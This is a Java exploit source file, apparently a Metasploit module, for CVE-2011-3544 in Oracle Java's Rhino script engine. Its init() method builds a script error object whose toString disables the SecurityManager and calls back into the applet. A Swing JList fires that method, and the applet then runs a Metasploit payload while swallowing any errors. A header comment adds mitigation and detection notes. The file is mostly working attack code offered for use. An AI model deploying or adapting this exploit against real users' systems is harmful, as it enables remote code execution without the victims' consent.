Path: blob/master/external/source/exploits/CVE-2011-3544/Exploit.java
/*
 * Oracle Java Applet Rhino Script Engine Remote Code Execution
 * CVE-2011-3544
 * ZDI-11-305
 *
 * This vulnerability is due to the way Rhino error objects are handled. Normally the script engine
 * has to ensure untrusted code not being allowed to perform, but a malicious attacker can actually
 * bypass this by creating an error object (which isn't checked by Rhino Script Engine), with a
 * custom 'toString()' method to allow code being run with full privileges. This also allows the
 * attacker to disable Java SecurityManager, and then run arbitrary code.
 *
 * Ref:
 * http://schierlm.users.sourceforge.net/CVE-2011-3544.html
 *
 * Defender's note: this is historical Metasploit module source for a vendor-patched 2011 issue
 * (see the vendor advisory for the exact fixed releases). The only durable mitigations are a
 * patched runtime and not running browser applets at all; the java.applet API is deprecated for
 * removal (JEP 398) and the SecurityManager it relies on is deprecated for removal (JEP 411) in
 * current JDKs. From a detection standpoint the tell-tale behaviour visible in this file is an
 * applet obtaining a javax.script engine and having script code call
 * java.lang.System.setSecurityManager(null).
 */

import java.applet.Applet;
import javax.script.*;
import javax.swing.JList;
import metasploit.Payload;

/**
 * Applet that triggers CVE-2011-3544 and hands control to the Metasploit payload.
 *
 * <p>The whole exploit lives in {@link #init()}; {@link #callBack()} is the Java-side
 * entry point that the injected script invokes once the SecurityManager has been removed.
 */
public class Exploit extends Applet {
    /**
     * Builds the malicious Rhino error object and places it in a Swing component.
     *
     * <p>Steps, as written below: obtain the "js" {@link ScriptEngine}; expose this applet to
     * the script under the binding name {@code applet}; evaluate a script that (1) installs a
     * {@code toString} on the script's global object which nulls the SecurityManager and calls
     * back into {@link #callBack()}, (2) creates an {@code Error} whose {@code message} is that
     * global object, and (3) returns the error. The returned object is then wrapped in a
     * {@link JList} added to the applet. Presumably the list's default cell renderer calls
     * {@code toString()} on the element when it is painted, which is what fires the script-defined
     * method outside Rhino's access checks — confirm against the Rhino/Swing behaviour of the
     * affected release.
     *
     * <p>Any {@link ScriptException} from the engine is only printed, so a failed attempt is
     * silent apart from the stack trace on stderr.
     */
    public void init() {
        try {
            ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
            Bindings b = engine.createBindings();
            // The script reaches back into this applet through the "applet" binding.
            b.put("applet", this);

            // Disable SecurityManager, and then run the payload
            // The error object isn't handled by Rhino, so the toString method
            // will not be restricted by access control
            //
            // The toString returns a single random lowercase letter (char code 97..122) so
            // that whatever calls it still receives a string after the side effects run.
            Object proxy = (Object) engine.eval(
                "this.toString = function() {" +
                " java.lang.System.setSecurityManager(null);" +
                " applet.callBack();" +
                " return String.fromCharCode(97 + Math.round(Math.random() * 25));" +
                "};" +
                "e = new Error();" +
                "e.message = this;" +
                "e", b);

            // Putting the object into a rendered component is the trigger; no further
            // explicit call to toString() appears in this file.
            JList list = new JList(new Object[] {proxy});
            this.add(list);
        }
        catch (ScriptException e) {
            e.printStackTrace();
        }
    }

    /**
     * Script-invoked entry point: runs the Metasploit payload.
     *
     * <p>Called from the injected {@code toString} after the SecurityManager has been set to
     * {@code null}. Every exception from {@code Payload.main} is swallowed, so the payload's
     * own failures are never reported.
     */
    public void callBack() {
        try {
            Payload.main(null);
        }
        catch (Exception e) {}
    }
}